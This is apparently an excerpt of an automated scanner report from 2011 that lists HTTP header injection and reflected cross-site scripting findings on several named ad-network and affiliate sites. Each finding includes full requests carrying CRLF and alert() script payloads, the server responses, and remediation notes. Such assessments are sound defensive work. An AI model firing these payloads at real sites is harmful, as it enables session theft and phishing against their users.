GET /cgi/r?;n=203;c=555503;s=8986;x=7936;f=201001141843480;u=j;z=TIMESTAMP;&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=ddacd%0d%0a54f1c4d6f1f HTTP/1.1 Host: o1.qnsr.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508
Response
HTTP/1.1 302 Found Date: Fri, 18 Feb 2011 12:48:02 GMT Server: QUAD 3G Connection: close Pragma: no-cache Cache-Control: private, max-age=0, no-cache Set-Cookie: QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk452110218044802446ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:48:02 GMT; DOMAIN=.qnsr.com P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Set-Cookie: QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==; path=/; EXPIRES=Sun, 20-Mar-11 12:48:02 GMT; DOMAIN=.qnsr.com P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Location: http://www.vendorseek.com/website_design_services.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=452110218044802446&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=ddacd 54f1c4d6f1f&&exp=y Content-Type: text/html; charset=iso-8859-1 Content-Length: 593
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>302 Found</TITLE> </HEAD><BODY> <H1>Found</H1> The document has moved <A HREF="http://www.vendorseek.com/website_design_services. ...[SNIP]...
The value of the ;n request parameter is copied into the Location response header. The payload 67f65%0d%0a03a2929b961 was submitted in the ;n parameter. This caused a response containing an injected HTTP header.
Request
GET /cgi/r?;n=203;c=555503;s=8986;x=7936;f=201001141843480;u=j;z=TIMESTAMP;67f65%0d%0a03a2929b961&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y HTTP/1.1 Host: o1.qnsr.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508
Response
HTTP/1.1 302 Found Date: Fri, 18 Feb 2011 12:47:24 GMT Server: QUAD 3G Connection: close Pragma: no-cache Cache-Control: private, max-age=0, no-cache Set-Cookie: QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk466110218044724846ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:47:24 GMT; DOMAIN=.qnsr.com P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Set-Cookie: QCP201001141843480=NjdmNjUNCjAzYTI5MjliOTYxJkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NQ==; path=/; EXPIRES=Sun, 20-Mar-11 12:47:24 GMT; DOMAIN=.qnsr.com P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Location: http://www.vendorseek.com/website_design_services.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=466110218044724846&67f65 03a2929b961&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y Content-Type: text/html; charset=iso-8859-1 Content-Length: 594
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>302 Found</TITLE> </HEAD><BODY> <H1>Found</H1> The document has moved <A HREF="http://www.vendorseek.com/website_design_services. ...[SNIP]...
The value of the CCID request parameter is copied into the Location response header. The payload bc1f7%0d%0a3520e81e85c was submitted in the CCID parameter. This caused a response containing an injected HTTP header.
Request
GET /cgi/r?;n=203;c=555503;s=8986;x=7936;f=201001141843480;u=j;z=TIMESTAMP;&CCID=bc1f7%0d%0a3520e81e85c&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y HTTP/1.1 Host: o1.qnsr.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508
Response
HTTP/1.1 302 Found Date: Fri, 18 Feb 2011 12:47:35 GMT Server: QUAD 3G Connection: close Pragma: no-cache Cache-Control: private, max-age=0, no-cache Set-Cookie: QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk486110218044735480ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:47:35 GMT; DOMAIN=.qnsr.com P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Set-Cookie: QCP201001141843480=JkNDSUQ9YmMxZjcNCjM1MjBlODFlODVjJlFUUj1aWmYwWmEyMDEyMzUxOVpiMFpnMTcyWnc1NlptMFpjMjAzNjMwOTEwLDIwMzYzMDkxMFpzOTU0NFpaJkNMSz0zOTQxMTAyMQ==; path=/; EXPIRES=Sun, 20-Mar-11 12:47:35 GMT; DOMAIN=.qnsr.com P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Location: http://www.vendorseek.com/website_design_services.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=486110218044735480&&CCID=bc1f7 3520e81e85c&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y Content-Type: text/html; charset=iso-8859-1 Content-Length: 577
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>302 Found</TITLE> </HEAD><BODY> <H1>Found</H1> The document has moved <A HREF="http://www.vendorseek.com/website_design_services. ...[SNIP]...
The value of the CLK request parameter is copied into the Location response header. The payload fd955%0d%0a5e75bad9d9d was submitted in the CLK parameter. This caused a response containing an injected HTTP header.
Request
GET /cgi/r?;n=203;c=555503;s=8986;x=7936;f=201001141843480;u=j;z=TIMESTAMP;&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=fd955%0d%0a5e75bad9d9d&&exp=y HTTP/1.1 Host: o1.qnsr.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508
Response
HTTP/1.1 302 Found Date: Fri, 18 Feb 2011 12:47:43 GMT Server: QUAD 3G Connection: close Pragma: no-cache Cache-Control: private, max-age=0, no-cache Set-Cookie: QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk716110218044743211ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:47:43 GMT; DOMAIN=.qnsr.com P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Set-Cookie: QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPWZkOTU1DQo1ZQ==; path=/; EXPIRES=Sun, 20-Mar-11 12:47:43 GMT; DOMAIN=.qnsr.com P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Location: http://www.vendorseek.com/website_design_services.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=716110218044743211&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=fd955 5e75bad9d9d&&exp=y&&exp=y Content-Type: text/html; charset=iso-8859-1 Content-Length: 576
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>302 Found</TITLE> </HEAD><BODY> <H1>Found</H1> The document has moved <A HREF="http://www.vendorseek.com/website_design_services. ...[SNIP]...
The value of the QTR request parameter is copied into the Location response header. The payload 8087b%0d%0aba64b5bd6e9 was submitted in the QTR parameter. This caused a response containing an injected HTTP header.
Request
GET /cgi/r?;n=203;c=555503;s=8986;x=7936;f=201001141843480;u=j;z=TIMESTAMP;&CCID=20123519203630910&QTR=8087b%0d%0aba64b5bd6e9&CLK=394110218044719808&&exp=y HTTP/1.1 Host: o1.qnsr.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508
Response
HTTP/1.1 302 Found Date: Fri, 18 Feb 2011 12:47:41 GMT Server: QUAD 3G Connection: close Pragma: no-cache Cache-Control: private, max-age=0, no-cache Set-Cookie: QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk902110218044741375ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:47:41 GMT; DOMAIN=.qnsr.com P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Set-Cookie: QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPTgwODdiDQpiYTY0YjViZDZlOSZDTEs9Mzk0MTEwMjE4MDQ0NzE5ODA4JiZleHA9eQ==; path=/; EXPIRES=Sun, 20-Mar-11 12:47:41 GMT; DOMAIN=.qnsr.com P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Location: http://www.vendorseek.com/website_design_services.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=902110218044741375&&CCID=20123519203630910&QTR=8087b ba64b5bd6e9&CLK=394110218044719808&&exp=y&&exp=y Content-Type: text/html; charset=iso-8859-1 Content-Length: 536
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>302 Found</TITLE> </HEAD><BODY> <H1>Found</H1> The document has moved <A HREF="http://www.vendorseek.com/website_design_services. ...[SNIP]...
2.28. http://o1.qnsr.com/cgi/r [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://o1.qnsr.com
Path:
/cgi/r
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 73f58%0d%0abdb12e368f6 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /cgi/r?;n=203;c=555503;s=8986;x=7936;f=201001141843480;u=j;z=TIMESTAMP;&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&73f58%0d%0abdb12e368f6=1 HTTP/1.1 Host: o1.qnsr.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508
Response
HTTP/1.1 302 Found Date: Fri, 18 Feb 2011 12:48:11 GMT Server: QUAD 3G Connection: close Pragma: no-cache Cache-Control: private, max-age=0, no-cache Set-Cookie: QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk306110218044811267ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:48:11 GMT; DOMAIN=.qnsr.com P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Set-Cookie: QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==; path=/; EXPIRES=Sun, 20-Mar-11 12:48:11 GMT; DOMAIN=.qnsr.com P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Location: http://www.vendorseek.com/website_design_services.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=306110218044811267&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&73f58 bdb12e368f6=1&&exp=y Content-Type: text/html; charset=iso-8859-1 Content-Length: 601
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>302 Found</TITLE> </HEAD><BODY> <H1>Found</H1> The document has moved <A HREF="http://www.vendorseek.com/website_design_services. ...[SNIP]...
The value of the N cookie is copied into the Set-Cookie response header. The payload 8adf5%0d%0ab18ee1d46fb was submitted in the N cookie. This caused a response containing an injected HTTP header.
Request
GET /rtx/r.js?cmd=DWT&si=18139&pi=L&xs=1&pu=http%253A//an.tacoda.net/an/18139/bizo_multi.htm%253Fpid%253D224%2526u%253Dind%253Aind_bizser%2526ifu%253Dhttp%25253A//js.bizographics.com/support/partner.html%25253Fpid%25253D224%252526u%25253Dind%25253Aind_bizser&v=5.5&cb=72895 HTTP/1.1 Host: tacoda.at.atwola.com Proxy-Connection: keep-alive Referer: http://an.tacoda.net/an/18139/bizo_multi.htm?pid=224&u=ind:ind_bizser Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; ANRTT=53615^1^1298638034; Tsid=0^1298033234^1298035034|18139^1298033234^1298035034; TData=99999|^|#|53615; Anxd=x; N=2:4bb61a8cd423e3c48ff8843b87a5babd8adf5%0d%0ab18ee1d46fb; ATTAC=a3ZzZWc9OTk5OTk6NTM2MTU=
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 12:51:11 GMT Server: Apache/1.3.37 (Unix) mod_perl/1.29 P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM" P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM" Cache-Control: max-age=900 Expires: Fri, 18 Feb 2011 13:06:11 GMT Set-Cookie: ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; path=/; expires=Mon, 13-Feb-12 12:51:11 GMT; domain=.at.atwola.com Set-Cookie: ANRTT=53615^1^1298638271; path=/; expires=Fri, 25-Feb-11 12:51:11 GMT; domain=tacoda.at.atwola.com Set-Cookie: Tsid=0^1298033234^1298035271|18139^1298033234^1298035271; path=/; expires=Fri, 18-Feb-11 13:21:11 GMT; domain=tacoda.at.atwola.com Set-Cookie: TData=99999|^|#|53615; expires=Mon, 13-Feb-12 12:51:11 GMT; path=/; domain=tacoda.at.atwola.com Set-Cookie: Anxd=x; expires=Fri, 18-Feb-11 18:51:11 GMT; path=/; domain=tacoda.at.atwola.com Set-Cookie: N=2:4bb61a8cd423e3c48ff8843b87a5babd8adf5 b18ee1d46fb,4bb61a8cd423e3c48ff8843b87a5babd; expires=Mon, 13-Feb-12 12:51:11 GMT; path=/; domain=tacoda.at.atwola.com Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTM2MTU=; expires=Mon, 13-Feb-12 12:51:11 GMT; path=/; domain=.at.atwola.com ntCoent-Length: 110 Content-Type: application/x-javascript Content-Length: 110
var ANUT=1; var ANOO=0; var ANSR=1; var ANTID='16lsqii1n1a3cr'; var ANSL='99999|^|#|53615'; ANRTXR();
The value of the si request parameter is copied into the Set-Cookie response header. The payload 15802%0d%0a6fe09aee5f0 was submitted in the si parameter. This caused a response containing an injected HTTP header.
Request
GET /rtx/r.js?cmd=DWT&si=15802%0d%0a6fe09aee5f0&pi=L&xs=3&pu=http%253A//an.tacoda.net/an/18139/bizo_multi.htm%253Fpid%253D224%2526u%253Dind%253Aind_bizser%2526ifu%253Dhttp%25253A//js.bizographics.com/support/partner.html%25253Fpid%25253D224%252526u%25253Dind%25253Aind_bizser&v=5.5&cb=4708&tid= HTTP/1.1 Host: tacoda.at.atwola.com Proxy-Connection: keep-alive Referer: http://an.tacoda.net/an/18139/bizo_multi.htm?pid=224&u=ind:ind_bizser Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 12:47:47 GMT Server: Apache/1.3.37 (Unix) mod_perl/1.29 P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM" P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM" Cache-Control: max-age=900 Expires: Fri, 18 Feb 2011 13:02:47 GMT Set-Cookie: ATTACID=a3Z0aWQ9MTZsc3FqajBjYzJqbWc=; path=/; expires=Mon, 13-Feb-12 12:47:47 GMT; domain=.at.atwola.com Set-Cookie: ANRTT=53615^1^1298638067; path=/; expires=Fri, 25-Feb-11 12:47:47 GMT; domain=tacoda.at.atwola.com Set-Cookie: Tsid=0^1298033267^1298035067|15802 6fe09aee5f0^1298033267^1298035067; path=/; expires=Fri, 18-Feb-11 13:17:47 GMT; domain=tacoda.at.atwola.com Set-Cookie: TData=99999|^|#|53615; expires=Mon, 13-Feb-12 12:47:47 GMT; path=/; domain=tacoda.at.atwola.com Set-Cookie: Anxd=x; expires=Fri, 18-Feb-11 18:47:47 GMT; path=/; domain=tacoda.at.atwola.com Set-Cookie: N=2:4bb61a8cd423e3c48ff8843b87a5babd; expires=Mon, 13-Feb-12 12:47:47 GMT; path=/; domain=tacoda.at.atwola.com Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTM2MTU=; expires=Mon, 13-Feb-12 12:47:47 GMT; path=/; domain=.at.atwola.com ntCoent-Length: 110 Content-Type: application/x-javascript Content-Length: 110
var ANUT=1; var ANOO=0; var ANSR=1; var ANTID='16lsqjj0cc2jmg'; var ANSL='99999|^|#|53615'; ANRTXR();
2.31. http://www.thelist.com/pppclicks.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.thelist.com
Path:
/pppclicks.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload f509c%0d%0a6dde35ca4e3 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
The value of the target request parameter is copied into the Location response header. The payload d7130%0d%0acc710b14b5f was submitted in the target parameter. This caused a response containing an injected HTTP header.
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the dm_affiliate request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e5948'%3balert(1)//81e894ba1c7 was submitted in the dm_affiliate parameter. This input was echoed as e5948';alert(1)//81e894ba1c7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ModuleG.aspx?dm_affiliate=448e5948'%3balert(1)//81e894ba1c7&dm_size=336x280&dm_color_border=66CC99&dm_color_title=000000&dm_color_links=000000&dm_color_background=FFFFFF&dm_set_categorylist=&dm_set_categoryexcludelist=&dm_set_autoregion=no&dm_set_regionlist=&dm_set_regionexcludelist=&dm_set_topic=technology&dm_open_in_new_window=&dm_link_url= HTTP/1.1 Host: aserve.directorym.com Proxy-Connection: keep-alive Referer: http://www.pdastreet.com/?79bf7--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E338075590f4=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="NOI CURa ADMa DEVa TAIa PSAa PSDa CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Cache-Control: private, max-age=86400 Date: Fri, 18 Feb 2011 15:22:09 GMT Connection: close Content-Length: 70772
<?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <script type="text/javascript"> var Url = 'http://www.directorym.net/s.aspx?s=affiliate448e5948';alert(1)//81e894ba1c7&a=448e5948';alert(1)//81e894ba1c7' var CId = 0; var RId = ''; var CIdDefault = 0; var RIdDefault = ''; var CL = new Array(); var RL = new Array(); RL[0] = new Option ...[SNIP]...
The value of the dm_link_url request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49631'-alert(1)-'9e2f0599833 was submitted in the dm_link_url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ModuleG.aspx?dm_affiliate=448&dm_size=336x280&dm_color_border=66CC99&dm_color_title=000000&dm_color_links=000000&dm_color_background=FFFFFF&dm_set_categorylist=&dm_set_categoryexcludelist=&dm_set_autoregion=no&dm_set_regionlist=&dm_set_regionexcludelist=&dm_set_topic=technology&dm_open_in_new_window=&dm_link_url=49631'-alert(1)-'9e2f0599833 HTTP/1.1 Host: aserve.directorym.com Proxy-Connection: keep-alive Referer: http://www.pdastreet.com/?79bf7--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E338075590f4=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="NOI CURa ADMa DEVa TAIa PSAa PSDa CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Cache-Control: private, max-age=86400 Date: Fri, 18 Feb 2011 15:22:15 GMT Connection: close Content-Length: 70741
